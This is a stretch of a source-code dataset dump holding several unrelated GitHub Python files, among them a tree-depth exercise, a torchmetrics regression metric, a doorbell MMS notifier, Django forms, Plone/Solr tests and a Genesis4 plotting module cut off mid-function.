self.ax.plot([self.previous_X[0]/self.resolution, X[0]/self.resolution], [self.previous_X[1]/self.resolution, X[1]/self.resolution], \"r\")\n if self.img is None:\n self.img = self.ax.imshow(map_matrix.T, cmap='Greys')\n else:\n self.img.set_data(map_matrix.T)\n self.previous_X = X\n plt.pause(0.0001)\n plt.draw()\n\n\n\n# # Example in 25 steps:\n# map_visualizer=MapVisualizer(8,1000)\n# for i in range(25):\n# X = [0.2*i, 0.3*i, i*np.pi / 4]\n# test=np.random.rand(1000000).reshape((1000,1000))\n# map_visualizer.visualize(X,test)\n\n\n","repo_name":"Zhefan-Xu/gmapping","sub_path":"MapVisualization.py","file_name":"MapVisualization.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"4"} +{"seq_id":"33317835282","text":"import collections\nfrom tree import TreeNode, make_binary_tree\n\n\ndef first_solution(root: TreeNode) -> int:\n if not root:\n return 0\n depths = []\n\n def dfs(node, depth):\n if node.left is None and node.right is None:\n depths.append(depth)\n return depth\n depth += 1\n\n for child in [node.left, node.right]:\n if child is not None:\n dfs(child, depth)\n return depth\n\n dfs(root, 1)\n return max(depths)\n\n\ndef second_solution(root: TreeNode) -> int:\n if not root:\n return 0\n max_depth = 0\n\n def dfs(node, depth, maximum):\n if node.left is None and node.right is None:\n return max(maximum, depth)\n depth += 1\n\n for child in [node.left, node.right]:\n if child is not None:\n maximum = dfs(child, depth, maximum)\n return maximum\n\n return dfs(root, 1, max_depth)\n\n\ndef third_solution(root: TreeNode) -> int:\n queue = collections.deque([root])\n depth = 0\n\n while queue:\n depth += 1\n for _ in range(len(queue)):\n node = queue.popleft()\n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n return depth\n\n\nif __name__ == \"__main__\":\n tree = [3, 9, 20, None, None, 15, 7]\n root = make_binary_tree(tree)\n print(third_solution(root))\n","repo_name":"youngbin-ro/problem-solving","sub_path":"python-algorithm-interview-book/chapter14. tree/maximum-depth-of-binary-tree.py","file_name":"maximum-depth-of-binary-tree.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"9421405742","text":"from typing import Any, Optional, Sequence, Union\n\nimport torch\nfrom torch import Tensor, tensor\n\nfrom torchmetrics.functional.regression.r2 import _r2_score_update\nfrom torchmetrics.functional.regression.rse import _relative_squared_error_compute\nfrom torchmetrics.metric import Metric\nfrom torchmetrics.utilities.imports import _MATPLOTLIB_AVAILABLE\nfrom torchmetrics.utilities.plot import _AX_TYPE, _PLOT_OUT_TYPE\n\nif not _MATPLOTLIB_AVAILABLE:\n __doctest_skip__ = [\"RelativeSquaredError.plot\"]\n\n\nclass RelativeSquaredError(Metric):\n r\"\"\"Computes the relative squared error (RSE).\n\n .. math:: \\text{RSE} = \\frac{\\sum_i^N(y_i - \\hat{y_i})^2}{\\sum_i^N(y_i - \\overline{y})^2}\n\n Where :math:`y` is a tensor of target values with mean :math:`\\overline{y}`, and\n :math:`\\hat{y}` is a tensor of predictions.\n\n If num_outputs > 1, the returned value is averaged over all the outputs.\n\n As input to ``forward`` and ``update`` the metric accepts the following input:\n\n - ``preds`` (:class:`~torch.Tensor`): Predictions from model in float tensor with shape ``(N,)``\n or ``(N, M)`` (multioutput)\n - ``target`` (:class:`~torch.Tensor`): Ground truth values in float tensor with shape ``(N,)``\n or ``(N, M)`` (multioutput)\n\n As output of ``forward`` and ``compute`` the metric returns the following output:\n\n - ``rse`` (:class:`~torch.Tensor`): A tensor with the RSE score(s)\n\n Args:\n num_outputs: Number of outputs in multioutput setting\n squared: If True returns RSE value, if False returns RRSE value.\n kwargs: Additional keyword arguments, see :ref:`Metric kwargs` for more info.\n\n Example:\n >>> from torchmetrics.regression import RelativeSquaredError\n >>> target = torch.tensor([3, -0.5, 2, 7])\n >>> preds = torch.tensor([2.5, 0.0, 2, 8])\n >>> relative_squared_error = RelativeSquaredError()\n >>> relative_squared_error(preds, target)\n tensor(0.0514)\n\n \"\"\"\n is_differentiable = True\n higher_is_better = False\n full_state_update = False\n sum_squared_error: Tensor\n sum_error: Tensor\n residual: Tensor\n total: Tensor\n\n def __init__(\n self,\n num_outputs: int = 1,\n squared: bool = True,\n **kwargs: Any,\n ) -> None:\n super().__init__(**kwargs)\n\n self.num_outputs = num_outputs\n\n self.add_state(\"sum_squared_error\", default=torch.zeros(self.num_outputs), dist_reduce_fx=\"sum\")\n self.add_state(\"sum_error\", default=torch.zeros(self.num_outputs), dist_reduce_fx=\"sum\")\n self.add_state(\"residual\", default=torch.zeros(self.num_outputs), dist_reduce_fx=\"sum\")\n self.add_state(\"total\", default=tensor(0), dist_reduce_fx=\"sum\")\n self.squared = squared\n\n def update(self, preds: Tensor, target: Tensor) -> None:\n \"\"\"Update state with predictions and targets.\"\"\"\n sum_squared_error, sum_error, residual, total = _r2_score_update(preds, target)\n\n self.sum_squared_error += sum_squared_error\n self.sum_error += sum_error\n self.residual += residual\n self.total += total\n\n def compute(self) -> Tensor:\n \"\"\"Computes relative squared error over state.\"\"\"\n return _relative_squared_error_compute(\n self.sum_squared_error, self.sum_error, self.residual, self.total, squared=self.squared\n )\n\n def plot(\n self, val: Optional[Union[Tensor, Sequence[Tensor]]] = None, ax: Optional[_AX_TYPE] = None\n ) -> _PLOT_OUT_TYPE:\n \"\"\"Plot a single or multiple values from the metric.\n\n Args:\n val: Either a single result from calling `metric.forward` or `metric.compute` or a list of these results.\n If no value is provided, will automatically call `metric.compute` and plot that result.\n ax: An matplotlib axis object. If provided will add plot to that axis\n\n Returns:\n Figure and Axes object\n\n Raises:\n ModuleNotFoundError:\n If `matplotlib` is not installed\n\n .. plot::\n :scale: 75\n\n >>> from torch import randn\n >>> # Example plotting a single value\n >>> from torchmetrics.regression import RelativeSquaredError\n >>> metric = RelativeSquaredError()\n >>> metric.update(randn(10,), randn(10,))\n >>> fig_, ax_ = metric.plot()\n\n .. plot::\n :scale: 75\n\n >>> from torch import randn\n >>> # Example plotting multiple values\n >>> from torchmetrics.regression import RelativeSquaredError\n >>> metric = RelativeSquaredError()\n >>> values = []\n >>> for _ in range(10):\n ... values.append(metric(randn(10,), randn(10,)))\n >>> fig, ax = metric.plot(values)\n\n \"\"\"\n return self._plot(val, ax)\n","repo_name":"Lightning-AI/torchmetrics","sub_path":"src/torchmetrics/regression/rse.py","file_name":"rse.py","file_ext":"py","file_size_in_byte":4864,"program_lang":"python","lang":"en","doc_type":"code","stars":1718,"dataset":"github-code","pt":"4"} +{"seq_id":"33554070991","text":"import helper\nfrom da_bell_secrets import *\nfrom providers import PROVIDERS\nimport smtplib, ssl\nfrom email import encoders\nfrom email.mime.base import MIMEBase\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nimport pathlib\n\n''' \nThis program sends an SMS/MMS message to the \nowner of a Da Bell device to notify them that \nthe doorbell was pressed along with a photo. \n\nInfo: Attachment can be at most 1MB\nHad to learn that the hard way.\n'''\n\ndef send_text_message(file_path):\n __send_mms_via_email(file_path)\n\n@helper.threaded\ndef __send_mms_via_email(file_path):\n # initialize variables needed\n phone_number: str = PHONE_NUMBER\n door_ring_message: str = helper.DOOR_RING_MESSAGE\n file_path: str = file_path\n mime_maintype: str = helper.FILE_TYPE\n mime_subtype: str = pathlib.Path(file_path).suffix\n file_name: str = pathlib.Path(file_path).name\n phone_provider: str = PHONE_PROVIDER\n sender_credentials: tuple = SENDER_CREDENTIALS\n subject: str = helper.APP_NAME\n smtp_server: str = helper.SMTP_GMAIL\n smtp_port: int = helper.SMTP_PORT\n \n # get/create information needed to send message\n # get gmail and password from da_bell_secrets.py\n sender_email, email_password = sender_credentials\n \n # get message type (sms/mms) based on provider\n # some do not allow mms\n message_type = helper.MESSAGE_TYPE[0] \\\n if PROVIDERS.get(phone_provider).get(helper.MMS_SUPPORT_KEY) \\\n else helper.MESSAGE_TYPE[0]\n \n # create receiver email based on their phone number and carrier\n receiver_email = f'{phone_number}@{PROVIDERS.get(phone_provider).get(message_type)}'\n \n # create gmail body\n email_message = MIMEMultipart()\n email_message[\"Subject\"] = subject\n email_message[\"From\"] = sender_email\n email_message[\"To\"] = receiver_email\n email_message.attach(MIMEText(door_ring_message, helper.TEXT_TYPE))\n \n # open file being sent and attach to email_message\n with open(file_path, helper.READ_BINARY) as attachment:\n part = MIMEBase(mime_maintype, mime_subtype)\n part.set_payload(attachment.read())\n encoders.encode_base64(part)\n part.add_header(\n \"Content-Disposition\", f\"attachment; filename={file_name}\",\n )\n email_message.attach(part)\n\n # send the message\n with smtplib.SMTP_SSL(smtp_server, smtp_port, context = ssl.create_default_context()) as email:\n # securely login to gmail\n email.login(sender_email, email_password)\n # send email with body and attachment\n email.sendmail(sender_email, receiver_email, email_message.as_string())\n print(\"Da Bell owner notified that doorbell was pressed\")\n ","repo_name":"Amark18/Da-Bell","sub_path":"mms.py","file_name":"mms.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"18753118228","text":"from django import forms\nfrom django.core.exceptions import ValidationError\nfrom django.contrib.auth import get_user_model, forms as user_forms\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass UserCreateForm(user_forms.UserCreationForm):\n email = forms.EmailField()\n\n class Meta:\n model = get_user_model()\n fields = (\"username\", \"email\", )\n field_classes = {\"username\": user_forms.UsernameField}\n\n\nclass UserUpdateForm(forms.ModelForm):\n email = forms.EmailField()\n\n class Meta:\n model = get_user_model()\n fields = (\"username\", \"email\", \"first_name\", \"last_name\", )\n field_classes = {\"username\": user_forms.UsernameField}\n\n def clean_email(self):\n email = self.cleaned_data['email']\n username = self.cleaned_data['username']\n user_with_email = get_user_model().objects.filter(email=email).exclude(username=username)\n if not user_with_email.exists():\n return email\n else:\n raise ValidationError(_('User with this email address already exists'))\n","repo_name":"infohata/ptu2_adboard","sub_path":"adboard/user_menu/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"69970251672","text":"from Components.config import config\nfrom .Debug import logger\nfrom .FileUtils import readFile, writeFile\nfrom .CutListUtils import ptsToSeconds\n\n\nclass ParserMetaFile():\n\n\tmeta_keys = [\n\t\t\"service_reference\", \"name\", \"description\", \"rec_time\", \"tags\", \"length\", \"size\", \"service_data\"\n\t]\n\n\txmeta_keys = [\n\t\t\"timer_start_time\", \"timer_stop_time\", \"recording_start_time\", \"recording_stop_time\", \"recording_margin_before\",\n\t\t\"recording_margin_after\"\n\t]\n\n\tdef __init__(self, path):\n\t\tself.path = path\n\t\tself.meta_path = path + \".meta\"\n\t\tself.xmeta_path = path + \".xmeta\"\n\t\tself.meta = {}\n\t\tself.xmeta = {}\n\n\t\tself.meta_list = self.readMeta(self.meta_path)\n\t\tif self.meta_list:\n\t\t\tself.meta = self.list2dict(self.meta_list, self.meta_keys)\n\t\t\tif self.meta:\n\t\t\t\tself.meta[\"length\"] = ptsToSeconds(self.meta[\"length\"])\n\t\t\tself.xmeta_list = self.readMeta(self.xmeta_path)\n\t\t\tself.xmeta = self.list2dict(self.xmeta_list, self.xmeta_keys)\n\t\t\tif self.meta and not self.xmeta:\n\t\t\t\tself.xmeta[\"recording_start_time\"] = self.meta[\"rec_time\"]\n\t\t\t\tself.xmeta[\"recording_stop_time\"] = 0\n\t\t\t\tself.xmeta[\"recording_margin_before\"] = config.recording.margin_before.value * 60\n\t\t\t\tself.xmeta[\"recording_margin_after\"] = config.recording.margin_after.value * 60\n\n\tdef list2dict(self, alist, keys):\n\t\tadict = {}\n\t\tfor i, key in enumerate(keys):\n\t\t\tif i < len(alist):\n\t\t\t\ttry:\n\t\t\t\t\tadict[key] = int(alist[i])\n\t\t\t\texcept ValueError:\n\t\t\t\t\tadict[key] = alist[i]\n\t\treturn adict\n\n\tdef dict2list(self, adict, keys):\n\t\tlogger.debug(\"adict: %s\", adict)\n\t\talist = []\n\t\tfor key in keys:\n\t\t\tif key in adict:\n\t\t\t\talist.append(adict[key])\n\t\t\telse:\n\t\t\t\talist.append(\"\")\n\t\treturn alist\n\n\tdef readMeta(self, path):\n\t\tmeta_list = readFile(path).splitlines()\n\t\tmeta_list = [list_item.strip() for list_item in meta_list]\n\t\treturn meta_list\n\n\tdef getMeta(self):\n\t\tself.meta.update(self.xmeta)\n\t\tlogger.debug(\"meta: %s\", self.meta)\n\t\treturn self.meta\n\n\tdef updateXMeta(self, xmeta):\n\t\tlogger.debug(\"xmeta: %s\", xmeta)\n\t\tself.xmeta.update(xmeta)\n\t\tlogger.debug(\"self.xmeta: %s\", self.xmeta)\n\t\tself.saveXMeta()\n\n\tdef saveXMeta(self):\n\t\talist = self.dict2list(self.xmeta, self.xmeta_keys)\n\t\tdata = \"\\n\".join([str(line) for line in alist])\n\t\twriteFile(self.xmeta_path, data)\n","repo_name":"dream-alpha/CacheCockpit","sub_path":"src/ParserMetaFile.py","file_name":"ParserMetaFile.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18315509217","text":"import numpy as np\nimport os\n\nfrom OpenGL.GL import *\nfrom OpenGL.GL.framebufferobjects import *\nfrom OpenGL.arrays import vbo\n\nfrom ..textures import Texture\nfrom ..shaders import set_uniform, compileShader\nfrom .base import AbstractEffect\n\n\nclass FXAAEffect(AbstractEffect):\n '''Fast Approximate Anti Aliasing. It is an efficient way to add\n anti-aliasing to your scenes. The reason to have it is to\n reduce jagged lines.\n\n The parameters *span_max*, *reduce_mul*, *reduce_min* are\n tweakable even if it is suggested to keep them at their default value.\n\n .. image:: /_static/fxaa_on_off.png\n :width: 800px\n \n '''\n def __init__(self, widget, span_max = 4.0, reduce_mul=1/8.0, reduce_min=1/128.0):\n self.widget = widget\n curdir = os.path.dirname(__file__)\n \n vert = open(os.path.join(curdir, 'shaders', 'noeffect.vert')).read()\n frag = open(os.path.join(curdir, 'shaders', 'fxaa.frag')).read() \n # Compile quad shader\n vertex = compileShader(vert, GL_VERTEX_SHADER)\n fragment = compileShader(frag, GL_FRAGMENT_SHADER)\n \n self.span_max = span_max\n self.reduce_mul = reduce_mul\n self.reduce_min = reduce_min\n \n self.quad_program = shaders.compileProgram(vertex, fragment)\n\n def render(self, fb, texturedict):\n glBindFramebuffer(GL_FRAMEBUFFER, fb)\n glViewport(0, 0, self.widget.width(), self.widget.height())\n \n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n glUseProgram(self.quad_program)\n \n set_uniform(self.quad_program, 'FXAA_SPAN_MAX', '1f', self.span_max)\n set_uniform(self.quad_program, 'FXAA_REDUCE_MUL', '1f', self.reduce_mul)\n set_uniform(self.quad_program, 'FXAA_REDUCE_MIN', '1f', self.reduce_min)\n \n qd_id = glGetUniformLocation(self.quad_program, b\"textureSampler\")\n texture = texturedict['color']\n \n # Setting up the texture\n glActiveTexture(GL_TEXTURE0)\n texture.bind()\n \n # Set our \"quad_texture\" sampler to user Texture Unit 0\n glUniform1i(qd_id, 0)\n # Set resolution\n res_id = glGetUniformLocation(self.quad_program, b\"texcoordOffset\")\n glUniform2f(res_id, 1.0/self.widget.width(), 1.0/self.widget.height())\n\n # # Let's render a quad\n quad_data = np.array([-1.0, -1.0, 0.0,\n 1.0, -1.0, 0.0,\n -1.0, 1.0, 0.0,\n -1.0, 1.0, 0.0,\n 1.0, -1.0, 0.0,\n 1.0, 1.0, 0.0],\n dtype='float32')\n \n vboquad = vbo.VBO(quad_data)\n vboquad.bind()\n \n glVertexPointer(3, GL_FLOAT, 0, None) \n glEnableClientState(GL_VERTEX_ARRAY)\n\n # draw \"count\" points from the VBO\n glDrawArrays(GL_TRIANGLES, 0, 6)\n \n vboquad.unbind()\n glDisableClientState(GL_VERTEX_ARRAY)\n \n def on_resize(self, w, h):\n pass","repo_name":"chemlab/chemlab","sub_path":"chemlab/graphics/postprocessing/fxaa.py","file_name":"fxaa.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"en","doc_type":"code","stars":204,"dataset":"github-code","pt":"5"} +{"seq_id":"29899910725","text":"import os.path\n\nclass proxy_opts:\n auto = 'auto'\n manual = 'manual'\n noProxy = 'noProxy'\n\nclass schedule_opts:\n manual = 'manual'\n runEvery = 'runEvery'\n days = 'days'\n\nclass upload_opts:\n manual = 'manual'\n auto = 'auto'\n\ntimeFormat = 'hh:mm:ss'\ndateFormat = 'yyyy-MM-ddThh:mm:ss'\nrunEvery_opts = ['hour', 'minute']\nweekDaysStr = ['sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat']\ntourDisplayReasons = ['uncoupling', 'publish']\n\naccount_loginType = 'account/loginType'\naccount_rememberLogin = 'account/rememberLogin'\naccount_username = 'account/username'\naccount_password = 'account/password'\naccount_runOnStartup = 'account/runOnStartup'\naccount_sendErrorLog = 'account/sendErrorLog'\naccount_language = 'account/language'\naccount_dropboxPrompted = 'account/dropboxPrompted'\n\noauth_googleExpiry = 'oauth/googleExpiry'\noauth_facebookExpiry = 'oauth/facebookExpiry'\n\ncompute_rootFolder = 'compute/rootFolder'\ncompute_usersFolders = 'compute/usersFolders'\n\nschedule_runEvery_value = 'schedule/runEvery_value'\nschedule_runEvery_unit = 'schedule/runEvery_unit'\nschedule_day_sun = 'schedule/day_sun'\nschedule_day_mon = 'schedule/day_mon'\nschedule_day_tue = 'schedule/day_tue'\nschedule_day_wed = 'schedule/day_wed'\nschedule_day_thu = 'schedule/day_thu'\nschedule_day_fri = 'schedule/day_fri'\nschedule_day_sat = 'schedule/day_sat'\nschedule_day_time = 'schedule/day_time'\nschedule_upload = 'schedule/upload'\nschedule_schedule = 'schedule/schedule'\n\nvcs_installed_version = 'vcs/installedVersion'\nvcs_new_version = 'vcs/newVersionInstalled'\nvcs_new_version_path = 'vcs/newVersionPath'\nvcs_startup_version = 'vcs/startupVersion'\nvcs_events_notified = 'vcs/eventsNotified'\n\nstatus_showFinished = 'status/showFinished'\nstatus_showPath = 'status/showPath'\nstatus_showPending = 'status/showPending'\n\nno_proxy = 'connection/noProxy'\nproxy_server = 'connection/proxyServer'\nproxy_port = 'connection/proxyPort'\nproxy_protocol = 'connection/proxyScheme'\nproxy_is_authenticated = 'connection/isProxyAuthenticated'\nproxy_user = 'connection/proxyUser'\nproxy_password = 'connection/proxyPassword'\nproxy_connection = 'connection/proxyConnection'\n","repo_name":"SimeonRolev/iOS-Windows-settings-parser","sub_path":"config_parser/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"42409314477","text":"class Person(object):\n def __init__(self,name,age):\n self.name =name\n self.age =age\n\n def __str__(self):\n return \"<{} {}>\".format(self.name, self.age)\n\n\np =Person(\"小黑\",18)\nprint(p)\np2 = Person(\"高材生\",9000)\nprint(p2)","repo_name":"leiqing110/Django-Restaurant","sub_path":"APP01/类的__str__方法.py","file_name":"类的__str__方法.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"17536019661","text":"from subprocess import call, DEVNULL\n\n\ndef run_editor(cmds):\n for cmd in cmds:\n if program_exists(cmd[0]):\n call(cmd)\n break\n else:\n print('No editors found (tried {})'\n .format(', '.join(x[0] for x in cmds)))\n sys.exit(1)\n\n\ndef program_exists(name):\n return call(['which', name], stdout=DEVNULL, stderr=DEVNULL) == 0\n","repo_name":"chriswatrous/scripts","sub_path":"bin/edit_helpers.py","file_name":"edit_helpers.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"1773972724","text":"import pytest\nfrom .pages.product_page import ProductPage\nfrom .pages.basket_page import BasketPage\nfrom .pages.login_page import LoginPage\nimport time, secrets\n\nlink = 'http://selenium1py.pythonanywhere.com/catalogue/the-shellcoders-handbook_209/?promo=newYear'\n\nclass TestUserAddToBasketFromProductPage():\n\n @pytest.fixture(scope=\"function\", autouse=True)\n def setup(self, browser):\n registration_email = f'{str(time.time())}@fakemail.org'\n registration_password = secrets.token_urlsafe(8)\n self.link = link\n self.browser = browser\n self.page = ProductPage(self.browser, self.link)\n self.page.open()\n self.login_page = self.page.go_to_login_page()\n self.login_page = LoginPage(self.browser, self.link)\n self.login_page.register_new_user(registration_email, registration_password)\n self.login_page.should_be_authorized_user()\n\n def test_user_cant_see_success_message(self):\n self.page.should_not_be_success_message()\n\n @pytest.mark.need_review\n def test_user_can_add_product_to_basket(self):\n self.page.click_basket_button()\n\n@pytest.mark.need_review\ndef test_guest_can_add_product_to_basket(browser):\n browser = browser\n page = ProductPage(browser, link)\n page.open()\n page.click_basket_button()\n page.solve_quiz_and_get_code()\n page.should_be_right_book()\n\n@pytest.mark.skip\ndef test_guest_cant_see_success_message_after_adding_product_to_basket(self):\n browser = browser\n page = ProductPage(browser, link)\n page.open()\n page.click_basket_button()\n page.solve_quiz_and_get_code()\n page.should_not_be_success_message()\n\n\n@pytest.mark.skip\ndef test_message_disappeared_after_adding_product_to_basket(browser):\n browser = browser\n page = ProductPage(browser, link)\n page.open()\n page.click_basket_button()\n page.solve_quiz_and_get_code()\n page.should_disapear()\n\n@pytest.mark.skip\ndef test_guest_should_see_login_link_on_product_page(browser):\n browser = browser\n page = ProductPage(browser, link)\n page.open()\n page.should_be_login_link()\n\n@pytest.mark.need_review\ndef test_guest_can_go_to_login_page_from_product_page(browser):\n browser = browser\n page = ProductPage(browser, link)\n page.open()\n page.go_to_login_page()\n\n@pytest.mark.need_review\ndef test_guest_cant_see_product_in_basket_opened_from_product_page(browser):\n browser = browser\n page = ProductPage(browser, link)\n page.open()\n basket_page = page.go_to_basket_page()\n basket_page = BasketPage(browser, browser.current_url)\n basket_page.should_not_be_items_in_basket()\n basket_page.should_be_empty_basket()\n","repo_name":"Fidochek/SeleniumProject","sub_path":"test_product_page.py","file_name":"test_product_page.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"44442903365","text":"from unittest import defaultTestLoader\nfrom nva.universalsearch.tests.base import SolrTestCase\n\nfrom os import environ\nfrom transaction import abort, commit\nfrom zope.component import getUtility\nfrom zope.schema.interfaces import IVocabularyFactory\nfrom collective.solr.interfaces import ISolrConnectionConfig\nfrom collective.solr.interfaces import ISearch\nfrom collective.solr.dispatcher import solrSearchResults\nfrom collective.solr.utils import activate\nfrom nva.universalsearch.interfaces import IUniversalSearchConfig\n\n\ndef indexForDifferentSystem(obj, system='Other'):\n from collective.solr.indexer import SolrIndexProcessor\n original = SolrIndexProcessor.getData\n\n def getData(self, obj, attributes=None):\n data, missing = original(self, obj, attributes)\n data['UID'] = system + '.' + data['UID'] # uid needs to be unique\n data['system'] = system\n return data, missing\n\n SolrIndexProcessor.getData = getData\n obj.processForm()\n commit()\n SolrIndexProcessor.getData = original\n\n\nclass SolrServerTests(SolrTestCase):\n\n def afterSetUp(self):\n activate()\n self.portal.REQUEST.RESPONSE.write = lambda x: x # ignore output\n self.config = getUtility(ISolrConnectionConfig)\n if 'SOLR_PORT' in environ:\n self.config.port = int(environ['SOLR_PORT'])\n self.maintenance = self.portal.unrestrictedTraverse('solr-maintenance')\n self.maintenance.clear()\n self.search = getUtility(ISearch)\n\n def beforeTearDown(self):\n # due to the `commit()` in the tests below the activation of the\n # solr support in `afterSetUp` needs to be explicitly reversed,\n # but first all uncommitted changes made in the tests are aborted...\n abort()\n self.config.active = False\n commit()\n\n def testObjectCanBeSearchedViaSystemIndex(self):\n self.folder.processForm(values={'title': 'Foo'})\n commit() # indexing happens on commit\n indexForDifferentSystem(self.folder)\n system = self.portal.Title()\n self.assertEqual(len(self.search('+system:\"%s\"' % system)), 1)\n # without specifying the 'system' we should get two results\n self.assertEqual(len(self.search('+system:*')), 2)\n\n def testFullUriIsStoredInSolr(self):\n self.folder.processForm(values={'title': 'Foo'})\n commit() # indexing happens on commit\n self.assertEqual([r.uri for r in self.search('*:*')],\n [self.folder.absolute_url()])\n\n def testFullCustomizedUriIsStoredInSolr(self):\n config = getUtility(IUniversalSearchConfig)\n config.site_url = 'http://foo.com'\n self.folder.processForm(values={'title': 'Foo'})\n commit() # indexing happens on commit\n self.assertEqual([r.uri for r in self.search('*:*')],\n ['http://foo.com/Members/' + self.folder.getId()])\n\n def testSystemsVocabulary(self):\n self.folder.processForm(values={'title': 'Foo'})\n commit() # indexing happens on commit\n indexForDifferentSystem(self.folder)\n vocab = getUtility(IVocabularyFactory, name='nva.universalsearch.systems')\n self.assertEqual([i.token for i in vocab(self.portal)],\n ['Other', 'Plone site'])\n\n def testSearchResultsAreFilteredBySystems(self):\n self.folder.processForm(values={'title': 'Foo'})\n commit() # indexing happens on commit\n indexForDifferentSystem(self.folder)\n # by default 'systems' isn't set and we're getting all results\n results = solrSearchResults(SearchableText='Foo')\n self.assertEqual(sorted([(r.Title, r.system) for r in results]),\n [('Foo', 'Other'), ('Foo', 'Plone site')])\n # after setting 'systems' we only get results for those...\n config = getUtility(IUniversalSearchConfig)\n config.systems = ['Plone site']\n results = solrSearchResults(SearchableText='Foo')\n self.assertEqual(sorted([(r.Title, r.system) for r in results]),\n [('Foo', 'Plone site')])\n\n def testSearchResultsCanBeLimitedViaRequestParameters(self):\n self.folder.processForm(values={'title': 'Foo'})\n commit() # indexing happens on commit\n indexForDifferentSystem(self.folder)\n config = getUtility(IUniversalSearchConfig)\n config.systems = ['Plone site', 'Other'] # all 'systems' are allowed\n # explicitly setting an allowed 'system' limits results\n request = dict(SearchableText='[* TO *]', system='Other')\n results = solrSearchResults(request)\n self.assertEqual(sorted([(r.Title, r.system) for r in results]),\n [('Foo', 'Other')])\n\n def testOtherSystemsCannotBeSearchedViaRequestParameters(self):\n self.folder.processForm(values={'title': 'Foo'})\n commit() # indexing happens on commit\n indexForDifferentSystem(self.folder)\n config = getUtility(IUniversalSearchConfig)\n config.systems = ['Plone site']\n # explicitly setting another 'system' mustn't yield results\n request = dict(SearchableText='[* TO *]', system='Other')\n results = solrSearchResults(request)\n self.assertEqual(sorted([(r.Title, r.system) for r in results]),\n [('Foo', 'Plone site')])\n\n\ndef test_suite():\n return defaultTestLoader.loadTestsFromName(__name__)\n","repo_name":"witsch/novareto","sub_path":"nva.universalsearch/trunk/src/nva/universalsearch/tests/test_indexes.py","file_name":"test_indexes.py","file_ext":"py","file_size_in_byte":5499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41892482273","text":"from pmd_beamphysics.units import nice_array, nice_scale_prefix\nfrom pmd_beamphysics.labels import mathlabel\n\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\n\ndef plot_stats(genesis4_object, keys=[\"beam_xsize\", \"beam_ysize\"], tex=False, **kwargs):\n \"\"\"\n Plots stats\n\n \"\"\"\n nplots = len(keys)\n\n fig, axs = plt.subplots(nplots, **kwargs)\n\n # Make RHS axis for the solenoid field.\n xdat = genesis4_object.stat(\"zplot\")\n xmin = min(xdat)\n xmax = max(xdat)\n for i, key in enumerate(keys):\n ax = axs[i]\n\n ydat = genesis4_object.stat(key)\n ydat = np.mean(ydat, axis=1) # Average over slices\n\n ndat, factor, prefix = nice_array(ydat)\n unit = genesis4_object.units(key)\n units = f\"{prefix}{unit}\"\n # Hangle label\n ylabel = mathlabel(key, units=units, tex=tex)\n ax.set_ylabel(ylabel)\n ax.set_xlim(xmin, xmax)\n ax.plot(xdat, ndat)\n ax.set_xlabel(\"z (m)\")\n\n\ndef add_layout_to_axes(\n genesis4_object,\n *,\n ax=None,\n bounds=None,\n xfactor=1,\n add_legend=False,\n):\n \"\"\"\n Adds undulator layout to an axes.\n\n \"\"\"\n\n if bounds is None:\n zmin, zmax = 0, genesis4_object.stat(\"z\").max()\n else:\n zmin, zmax = bounds\n ax.set_xlim(zmin, zmax)\n\n dat = {}\n ax2 = ax.twinx()\n\n ax.set_xlabel(r\"$z$ (m)\")\n\n zlist = genesis4_object.stat(\"z\")\n\n lines = []\n for ax1, component, color, label, units in (\n (ax, \"aw\", \"red\", r\"$aw$\", \"1\"),\n (ax2, \"qf\", \"blue\", r\"Quad $k$\", r\"$1/m^2$\"),\n ):\n fz = genesis4_object.stat(component)\n\n y, factor, prefix = nice_array(fz)\n\n line = ax1.fill_between(zlist / xfactor, y, color=color, label=label, alpha=0.5)\n # lines += line\n\n ylabel = f\"{label} ({prefix}{units})\"\n ax1.set_ylabel(ylabel)\n\n labels = [line.get_label() for line in lines]\n if add_legend:\n ax.legend(lines, labels)\n\n\nfrom pmd_beamphysics.units import nice_array, nice_scale_prefix\nfrom pmd_beamphysics.labels import mathlabel\n\n\ndef plot_stats_with_layout(\n genesis4_object,\n ykeys=\"field_energy\",\n ykeys2=[],\n xkey=\"zplot\",\n xlim=None,\n ylim=None,\n ylim2=None,\n yscale='linear',\n yscale2='linear',\n nice=True,\n tex=False,\n include_layout=True,\n include_labels=True,\n include_legend=True,\n return_figure=False,\n **kwargs,\n):\n \"\"\"\n Plots stat output multiple keys.\n\n If a list of ykeys2 is given, these will be put on the right hand axis. This can also be given as a single key.\n\n Logical switches:\n nice: a nice SI prefix and scaling will be used to make the numbers reasonably sized. Default: True\n\n tex: use mathtext (TeX) for plot labels. Default: True\n\n include_legend: The plot will include the legend. Default: True\n\n include_layout: the layout plot will be displayed at the bottom. 